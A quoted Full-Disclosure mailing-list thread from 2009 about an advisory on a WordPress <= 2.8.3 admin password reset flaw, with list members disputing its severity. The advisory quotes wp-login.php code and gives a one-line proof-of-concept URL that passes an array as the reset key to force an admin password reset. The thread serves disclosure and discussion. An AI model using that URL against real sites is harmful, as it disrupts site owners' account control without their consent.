>>
>> LOL
>>
>> 2009/8/10 Jeremy Brown <0xjbrown41@gmail.com>
>>>
>>> I'm guessing your not a Wordpress administrator, Fabio. Nice find
>>> Laurent, as usual.
>>>
>>> On Mon, Aug 10, 2009 at 10:48 PM, laurent
>>> gaffie<laurent.gaffie@gmail.com> wrote:
>>> > Oh ok.
>>> > Then, let's avoid that function.
>>> > If it's useless to have a function who validate a reset passwd before
>>> > resetting it, let's just avoid it smartass.
>>> >
>>> >
>>> > 2009/8/10 Fabio N Sarmento [ Gmail ] <fabior2@gmail.com>
>>> >>
>>> >> There is no risk on this.
>>> >> It's just a little flaw, it doesn't broke anything or put your admin
>>> >> access in risk.
>>> >>
>>> >> :-P to me , this vulnerability is more "BUZZ" then real deal. LOL
>>> >>
>>> >> 2009/8/10 laurent gaffie <laurent.gaffie@gmail.com>
>>> >>>
>>> >>> Hi there,
>>> >>>
>>> >>> This wasn't tested on the 2.7* branch.
>>> >>> It as been tested on the  2.8.* branch, with php 5.3.0 & php 5.2.9 as
>>> >>> an
>>> >>> Apache 2.2.12 module, on a linux env.
>>> >>>
>>> >>>
>>> >>> Regards Laurent Gaffié
>>> >>>
>>> >>>
>>> >>>
>>> >>> 2009/8/10 Nicolas Valcárcel Scerpella
>>> >>> <nicolas.valcarcel@canonical.com>
>>> >>>>
>>> >>>> I don't see the issue with wp 2.7.1
>>> >>>>
>>> >>>> On Mon, 10 Aug 2009, laurent gaffie wrote:
>>> >>>>
>>> >>>> > Errata:
>>> >>>> >
>>> >>>> > "V. BUSINESS IMPACT
>>> >>>> > -------------------------
>>> >>>> > An attacker could exploit this vulnerability to compromise the
>>> >>>> > admin
>>> >>>> > account
>>> >>>> > of any wordpress/wordpress-mu <= 2.8.3"
>>> >>>> >
>>> >>>> > -->
>>> >>>> >
>>> >>>> > "V. BUSINESS IMPACT
>>> >>>> > -------------------------
>>> >>>> > An attacker could exploit this vulnerability to reset the admin
>>> >>>> > account of
>>> >>>> > any wordpress/wordpress-mu <= 2.8.3"
>>> >>>> >
>>> >>>> >
>>> >>>> > Regards Laurent Gaffié
>>> >>>> >
>>> >>>> >
>>> >>>> > 2009/8/10 laurent gaffie <laurent.gaffie@gmail.com>
>>> >>>> >
>>> >>>> > > =============================================
>>> >>>> > > - Release date: August 10th, 2009
>>> >>>> > > - Discovered by: Laurent Gaffié
>>> >>>> > > - Severity: Medium
>>> >>>> > > =============================================
>>> >>>> > >
>>> >>>> > > I. VULNERABILITY
>>> >>>> > > -------------------------
>>> >>>> > > WordPress <= 2.8.3 Remote admin reset password
>>> >>>> > >
>>> >>>> > > II. BACKGROUND
>>> >>>> > > -------------------------
>>> >>>> > > WordPress is a state-of-the-art publishing platform with a focus
>>> >>>> > > on
>>> >>>> > > aesthetics, web standards, and usability.
>>> >>>> > > WordPress is both free and priceless at the same time.
>>> >>>> > > More simply, WordPress is what you use when you want to work
>>> >>>> > > with
>>> >>>> > > your
>>> >>>> > > blogging software, not fight it.
>>> >>>> > >
>>> >>>> > > III. DESCRIPTION
>>> >>>> > > -------------------------
>>> >>>> > > The way Wordpress handle a password reset looks like this:
>>> >>>> > > You submit your email adress or username via this form
>>> >>>> > > /wp-login.php?action=lostpassword ;
>>> >>>> > > Wordpress send you a reset confirmation like that via email:
>>> >>>> > >
>>> >>>> > > "
>>> >>>> > > Someone has asked to reset the password for the following site
>>> >>>> > > and
>>> >>>> > > username.
>>> >>>> > > http://DOMAIN_NAME.TLD/wordpress
>>> >>>> > > Username: admin
>>> >>>> > > To reset your password visit the following address, otherwise
>>> >>>> > > just
>>> >>>> > > ignore
>>> >>>> > > this email and nothing will happen
>>> >>>> > >
>>> >>>> > >
>>> >>>> > >
>>> >>>> > >
>>> >>>> > > http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
>>> >>>> > > "
>>> >>>> > >
>>> >>>> > > You click on the link, and then Wordpress reset your admin
>>> >>>> > > password,
>>> >>>> > > and
>>> >>>> > > sends you over another email with your new credentials.
>>> >>>> > >
>>> >>>> > > Let's see how it works:
>>> >>>> > >
>>> >>>> > >
>>> >>>> > > wp-login.php:
>>> >>>> > > ...[snip]....
>>> >>>> > > line 186:
>>> >>>> > > function reset_password($key) {
>>> >>>> > >     global $wpdb;
>>> >>>> > >
>>> >>>> > >     $key = preg_replace('/[^a-z0-9]/i', '', $key);
>>> >>>> > >
>>> >>>> > >     if ( empty( $key ) )
>>> >>>> > >         return new WP_Error('invalid_key', __('Invalid key'));
>>> >>>> > >
>>> >>>> > >     $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM
>>> >>>> > > $wpdb->users WHERE
>>> >>>> > > user_activation_key = %s", $key));
>>> >>>> > >     if ( empty( $user ) )
>>> >>>> > >         return new WP_Error('invalid_key', __('Invalid key'));
>>> >>>> > > ...[snip]....
>>> >>>> > > line 276:
>>> >>>> > > $action = isset($_REQUEST['action']) ? $_REQUEST['action'] :
>>> >>>> > > 'login';
>>> >>>> > > $errors = new WP_Error();
>>> >>>> > >
>>> >>>> > > if ( isset($_GET['key']) )
>>> >>>> > >     $action = 'resetpass';
>>> >>>> > >
>>> >>>> > > // validate action so as to default to the login screen
>>> >>>> > > if ( !in_array($action, array('logout', 'lostpassword',
>>> >>>> > > 'retrievepassword',
>>> >>>> > > 'resetpass', 'rp', 'register', 'login')) && false ===
>>> >>>> > > has_filter('login_form_' . $action) )
>>> >>>> > >     $action = 'login';
>>> >>>> > > ...[snip]....
>>> >>>> > >
>>> >>>> > > line 370:
>>> >>>> > >
>>> >>>> > > break;
>>> >>>> > >
>>> >>>> > > case 'resetpass' :
>>> >>>> > > case 'rp' :
>>> >>>> > >     $errors = reset_password($_GET['key']);
>>> >>>> > >
>>> >>>> > >     if ( ! is_wp_error($errors) ) {
>>> >>>> > >         wp_redirect('wp-login.php?checkemail=newpass');
>>> >>>> > >         exit();
>>> >>>> > >     }
>>> >>>> > >
>>> >>>> > >
>>> >>>> > >
>>> >>>> > > wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
>>> >>>> > >     exit();
>>> >>>> > >
>>> >>>> > > break;
>>> >>>> > > ...[snip ]...
>>> >>>> > >
>>> >>>> > > You can abuse the password reset function, and bypass the first
>>> >>>> > > step
>>> >>>> > > and
>>> >>>> > > then reset the admin password by submiting an array to the $key
>>> >>>> > > variable.
>>> >>>> > >
>>> >>>> > >
>>> >>>> > > IV. PROOF OF CONCEPT
>>> >>>> > > -------------------------
>>> >>>> > > A web browser is sufficiant to reproduce this Proof of concept:
>>> >>>> > >
>>> >>>> > >
>>> >>>> > > http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
>>> >>>> > > The password will be reset without any confirmation.
>>> >>>> > >
>>> >>>> > > V. BUSINESS IMPACT
>>> >>>> > > -------------------------
>>> >>>> > > An attacker could exploit this vulnerability to compromise the
>>> >>>> > > admin
>>> >>>> > > account of any wordpress/wordpress-mu <= 2.8.3
>>> >>>> > >
>>> >>>> > > VI. SYSTEMS AFFECTED
>>> >>>> > > -------------------------
>>> >>>> > > All
>>> >>>> > >
>>> >>>> > > VII. SOLUTION
>>> >>>> > > -------------------------
>>> >>>> > > No patch aviable for the moment.
>>> >>>> > >
>>> >>>> > > VIII. REFERENCES
>>> >>>> > > -------------------------
>>> >>>> > > http://www.wordpress.org
>>> >>>> > >
>>> >>>> > > IX. CREDITS
>>> >>>> > > -------------------------
>>> >>>> > > This vulnerability has been discovered by Laurent Gaffié
>>> >>>> > > Laurent.gaffie{remove-this}(at)gmail.com
>>> >>>> > > I'd like to shoot some greetz to securityreason.com for them
>>> >>>> > > great
>>> >>>> > > research on PHP, as for this under-estimated vulnerability
>>> >>>> > > discovered by
>>> >>>> > > Maksymilian Arciemowicz :
>>> >>>> > > http://securityreason.com/achievement_securityalert/38
>>> >>>> > >
>>> >>>> > > X. REVISION HISTORY
>>> >>>> > > -------------------------
>>> >>>> > > August 10th, 2009: Initial release
>>> >>>> > >
>>> >>>> > > XI. LEGAL NOTICES
>>> >>>> > > -------------------------
>>> >>>> > > The information contained within this advisory is supplied
>>> >>>> > > "as-is"
>>> >>>> > > with no warranties or guarantees of fitness of use or otherwise.
>>> >>>> > > I accept no responsibility for any damage caused by the use or
>>> >>>> > > misuse of this information.
>>> >>>> > >
>>> >>>>
>>> >>>> > _______________________________________________
>>> >>>> > Full-Disclosure - We believe in it.
>>> >>>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> >>>> > Hosted and sponsored by Secunia - http://secunia.com/
>>> >>>>
>>> >>>> --
>>> >>>> Nicolas Valcárcel
>>> >>>> Security Engineer
>>> >>>> Custom Engineering Solutions Group
>>> >>>> Canonical OEM Services
>>> >>>> Mobile: +511 994 293 200
>>> >>>> Key fingerprint = 5C4D 0C85 D9C0 98FE 11F9  DD12 524E C3CD EF58 4970
>>> >>>> gpg --keyserver keyserver.ubuntu.com --recv-keys 654597FE
>>> >>>>
>>> >>>> -----BEGIN PGP SIGNATURE-----
>>> >>>> Version: GnuPG v1.4.9 (GNU/Linux)
>>> >>>>
>>> >>>> iQEcBAEBCAAGBQJKgNe5AAoJEFJOw83vWElwLj4H/3dk7RW9WJoUpzI6E5QKdXsF
>>> >>>> 7uNeGL8Yho9RZuPEK93IecImLa25Jy7KhzL+P4FfCCyYXVG8hxaUlUQss77PhsjK
>>> >>>> VG/YkDChiNJi2tj7jixcdpVy7MLiDxMiHBGNSzI2piBiZb3/toSBvZslSW2yqgIk
>>> >>>> OkqbJ7AE5yTu4sulhO29DRYzFUjvZHGKR2akRu/3RlOUHhwVDJw0m2ZO4M3MHz4+
>>> >>>> 1x/w7HhzmbMo/kioxJpPsU7f+axVnRMia9dZmvakfhmNdht98qAE/a7UlpT+ft1w
>>> >>>> Vua7DRYwOn4o5UYXhBmUL/uCUt3CLeT9Jgu0/bWZ3G3gR1Rw1edS7E5Q7A9wlEY=
>>> >>>> =UdOl
>>> >>>> -----END PGP SIGNATURE-----
>>> >>>>
>>> >>>
>>> >>>
>>> >>> _______________________________________________
>>> >>> Full-Disclosure - We believe in it.
>>> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> >>> Hosted and sponsored by Secunia - http://secunia.com/
>>> >>
>>> >>
>>> >>
>>> >> --
>>> >>
>>> >> If you have questions please let me know.
>>> >> Best regards,
>>> >> - Fábio - IT Manager
>>> >
>>> >
>>> >
>>> > _______________________________________________
>>> > Full-Disclosure - We believe in it.
>>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> > Hosted and sponsored by Secunia - http://secunia.com/
>>> >
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>>
>> --
>>
>> If you have questions please let me know.
>> Best regards,
>> - Fábio - IT Manager
>
>
>
> --
> follow me @twitter ! : http://twitter.com/laurentgaffie
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



--
/**
CONFIDENTIALITY NOTICE: This message is intended to be viewed only by
the listed recipient(s).
It may contain information that is privileged, confidential and/or
exempt from disclosure under applicable law.
Any dissemination, distribution or copying of this message is strictly
prohibited without our prior written permission.
If you are not an intended recipient, or if you have received this
communication in error, please notify us immediately by return e-mail
and permanently remove the original message and any copies from your
computer and all back-up systems.
*/
_________________________
g30rg3_x

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/